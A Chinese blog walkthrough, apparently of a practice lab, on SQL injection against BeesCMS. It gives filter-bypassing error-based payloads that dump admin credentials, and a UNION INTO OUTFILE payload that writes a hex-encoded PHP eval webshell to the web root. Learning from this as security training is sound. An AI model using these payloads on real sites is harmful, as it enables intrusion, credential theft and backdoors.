SQL注入讲解-BeesCMS系统漏洞分析溯源

最新推荐文章于 2024-05-25 22:00:00 发布
最新推荐文章于 2024-05-25 22:00:00 发布
阅读量1.2k 收藏 15
点赞数 8
分类专栏: 网络安全 文章标签: sql 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44415748/article/details/136058779
版权
本文详细描述了一种通过识别网页框架指纹、利用SQL注入漏洞进行目录遍历和爆库的方法,同时介绍了如何使用shell脚本进行联合查询,针对Cenots系统环境下的渗透思路和技术应用。
摘要由CSDN通过智能技术生成

判断网页框架

在这里插入图片描述

渗透思路

以前的思路
1.首先识别一下指纹 根据指纹查找历史漏洞(同样适用现在)
2.查找目录(目录里面会有很多惊喜)
通过御剑后台扫描工具找到文件夹后在网页打开文件夹进行测试
通过百度搜索查看历史漏洞
查看源代码发现它对账号和密码只有二个加密
在这里插入图片描述
在这里插入图片描述
我们通过burp来查看它有sql漏洞

在这里插入图片描述
爆库-123%27 an and d extractvalue(1,concat(0x7e,database()))%23
在这里插入图片描述
an and d extractvalue(1,concat(0x7e,(seselectlect gr group oup_concat(table_name) fr from om information_schema.tables whe where re table_schema i in n (database())),0x7e)) %23
在这里插入图片描述
没有显示出来我们可以用not in
在这里插入图片描述
an and d extractvalue(1,concat(0x7e,(seselectlect gr group oup_concat(column_name) fr from om information_schema.columns whe where re table_name i in n (bees_admin)),0x7e)) %23
在这里插入图片描述
an and d extractvalue(1,concat(0x7e,(seselectlect gr group oup_concat(admin_name,admin_password) fr from om bees_admin),0x7e)) %23
在这里插入图片描述
解码出来是admin 答案是对的 然后的话如果不显示全部的话可以用substr这个参数an and d extractvalue(1,concat(0x7e,substr((seselectlect gr group oup_concat(admin_password) fr from om bees_admin),1),0x7e)) %23 显示全部
我这边用的是别人搭建的网站
在这里插入图片描述

在这里插入图片描述

shell

请记住写shell脚本是这个网站可以使用联合查询语句union select
首先我们使用order by 知道它有5列
admin’ uni union on seselectlect 1,0x3C3F70687020406576616C28245F524551554553545B276F627365275D293B203F3E,3,4,5 i into nto outoutfilefile ‘/var/www/html/s.php’#
如果细心一点在前面我们爆破的时候就知道他是cenots的系统了那么目录就应该在var/www/html 也可以使用@@datadir 查看路径
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

Ryongao
关注
  • 8
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Beescms_v4.0 sql注入漏洞复现与原理分析(白盒与黑盒)
不想当脚本小子的脚本小子
12-27 2458
一、漏洞描述 Beescms v4.0由于后台登录验证码设计缺陷以及代码防护缺陷导致存在bypass全局防护的SQL注入。 二、漏洞环境搭建 1.官方下载Beescms v4.0,下载地址: http://beescms.com/cxxz.html,然后解压压缩文件,然后把文件放到phpstudy的网站根目录 2.浏览器访问http://安装目录/install,开始安装 一直下一步出现如下界面即可安装完成: 安装完成后修改my.ini文件,在[mysqld]后面添加secure_fil
BeesCMS的SQL注入漏洞
Ms08067安全实验室
08-06 3501
本文作者:arakh(MS08067实验室Web安全攻防知识星球学员)根据星球布置作业,完成BeesCMS的SQL注入漏洞过程如下:1. 扫描后台 获得后台登陆地址:2. 登陆后台...
内部靶场系列|BeesCms
白帽子凯哥聊黑客
05-30 978
校验上传文件的content-type字段,如果content-type字段是允许上传的类型,则上传成功,否则上传失败。所以这里我们只要在数据包中修改content-type字段,就可以绕过上传校验,上传webshell。审计代码得知,该靶场的Content-Type白名单是image/gif。,只是这靶场我把Content-Type白名单限定到只有一个。修改Content-Type白名单为 image/gif。1、 弱口令进入系统后台,文件上传。1、 使用弱口令登录进后台。2、 文件上传点的逻辑。
【某CMS漏洞SQL注入漏洞分析
最新发布
qingkahui24689的博客
05-25 911
本文直接从一个入口的注入点展开,想找到一条合适的链路到GetShell的完整过程,但是遗憾的是,没能解决6位随机后台地址的问题,故实际利用起来的话,局限性还是有的,姑且称之为一次分享式的尝试性代码审计体验录吧。黑客&网络安全如何学习。
BeesCMS系统漏洞分析
weixin_47493074的博客
09-25 2357
BeesCMS系统漏洞分析
Beescms_v4.0 sql注入漏洞分析
WY92139010的博客
09-25 3412
Beescms_v4.0 sql注入漏洞分析 一、漏洞描述 Beescms v4.0由于后台登录验证码设计缺陷以及代码防护缺陷导致存在bypass全局防护的SQL注入。 二、漏洞环境搭建 1、官方下载Beescms v4.0,下载地址: http://beescms.com/cxxz.html 2、解压压缩文件,然后把文件放到phpstudy的网站根目录 3、浏览器访问htt...
【代码审计】小白友好的根据CNVD审计BEESCMS
uuzeray的博客
01-29 1535
我们就用刚上传的一句话木马试一下:upload/img/20121208/201212082353104864.php。看起来有很多,但不少include的参数已经写死了,这些我们就不用看,我们需要找可控变量。访问一下/admin/admin_channel.php。找到/admin/admin_channel.php。访问/admin/admin_pic.php。回到/admin/admin_pic.php。直接用第一个/admin_ajax.php。跟一下$value,发现是全局且可控的。
0x2B.BeesCMS系统漏洞分析溯源
qq_31679787的博客
10-23 791
通过使用御剑扫描得到了后台页面,测试了一下admin/admin,发现能够登陆,存在弱口令; 登陆到后台页面,发现操作系统是linux,开始寻找能够上传shell的页面; 寻找后发现,后台的功能都不能实现,但是在报错信息中能够得到网站目录为/var/www/html; 查找资料后发现在登陆界面存在SQL注入;在admin后加'测试,发现页面报错; 通过order by测试得...
php 3.2 get order sn,beescms 3.3 /mx_form/order_save.php SQL注入漏洞
weixin_29668665的博客
03-27 121
"""If you have issues about development, please read:https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.mdfor more about information, plz visit http://pocsuite.org"""from pocsuite3.api impo...
mysql注入审计_【代码审计】对Beescms SQL注入漏洞的进一步思考
weixin_35638218的博客
01-28 335
0x02 Mysql注入的一个特性上篇分析到,由于函数fl_html()的影响,其实就是php函数htmlspecialchars(),导致不能写shell到目标机器。其实这里利用Mysql注入的一个特性就可以达到注入的效果。即对shell部分进行Hex编码,或者用mysql函数char()就可以轻松绕过这里的限制。方法一 hex编码我们写入shell的语句是:[SQL] 纯文本查看 复制代码us...
对beecms网站进行SQL注入和文件上传的报告:
weixin_73760178的博客
09-11 483
在这里可能会出现解密不成功的情况,那就是有可能是该代码的字符限制在了32位,没输出完,那么我们需要使用sub是、tr截断函数进行输出。如果发现没有SQL注入的,但是又没有验证码,那么就可以进行bp的intruder部分进行暴力破解——如flyocms2.0.6。在此不好使用联合注入,因为后面的limit的限制,但从中可以看出它报错报的很详细,所以使用报错注入。是对网站进行识别(识别指纹),也就是确定此网站是php的还是什么,根据指纹查找历史漏洞。通过查找它的源码,确定它的绕过规则。
SQL注入天书-ASP注入漏洞全接触.pdf
07-09
SQL注入天书-ASP注入漏洞全接触
YXcms-含有SQL注入漏洞的源码包.zip
03-17
【标题】"YXcms-含有SQL注入漏洞的源码包.zip" 提供了一个关键的安全问题,即SQL注入漏洞,这是许多网站和应用程序面临的一种常见威胁。SQL注入是指攻击者通过在输入字段中插入恶意SQL代码,以获取、修改、删除...
sql注入讲解ppt.pptx
08-10
1. 广泛性:SQL 注入可以发生在各种 web 应用程序中,无论是使用哪种编程语言或数据库管理系统。 2. 隐蔽性:SQL 注入攻击往往是隐蔽的,很难被发现,需要具备专业的安全知识和经验来检测和防御。 3. 危害大:SQL ...
SQL注入漏洞全接触.ppt
11-15
* 根据不同的数据库管理系统, SQL注入漏洞可以分为Access注入、SQL Server注入、MySQL注入等。 * 不同的数据库管理系统有不同的函数、注入方法,所以在注入之前,我们还要判断一下数据库的类型。 四、 SQL注入漏洞...
Beescms代码审计
qq_50589021的博客
09-20 745
Beescms代码审计之任意文件上传漏洞 前言 本次代码审计过程主要针对文件上传漏洞初级审计流程的思路进行复现 关键代码 文件上传: $_FILES,type="file",上传,move_upload_file()等 开始 搜索type="file"字段发现不少东西: 选择第二个,发现了用户自定义的函数: 跟踪一下: 结合实际情况进行抓包通过参数定位到代码中进行确定: 可以确定确实是这一块的代码 两处滤点: 针对太大的图片进行了过滤 将图片类型与传入的参数$type数组进行了比较,判断是否满足数组
BeesCMS4.0多处漏洞复现
1匹黑马
04-20 8081
文章目录前言漏洞复现后台报错注入 前言 本次复现的漏洞有: 后台报错注入漏洞 文件上传漏洞 变量覆盖漏洞 Beescms v4.0由于后台登录设计缺陷以及代码防护缺陷导致存在bypass全局防护的SQL注入、文件上传、变量覆盖漏洞。现在依然有许多企业选用BeesCMS4.0,百度搜powerd by BEESCMS © 2010-2015 www.beescms.com 还是有很多站的: ...
360众测靶场题库之1-BeesCMS系统漏洞
zjl12344的博客
03-03 5401
360众测靶场题库
SQL注入漏洞-手工注入
05-21
对于SQL注入漏洞的手工注入,建议使用一些工具来进行测试,如SQLMap、Havij等。这些工具可以通过一些特定的语句来测试目标网站是否存在SQL注入漏洞,并且可以自动化执行攻击,并且提供详细的攻击日志,方便测试人员进行漏洞的修复和弥补。但是需要注意的是,在使用这些工具进行测试时,一定要严格遵守相关法律法规,不得滥用,以免造成不必要的损失和困扰。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ryongao

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值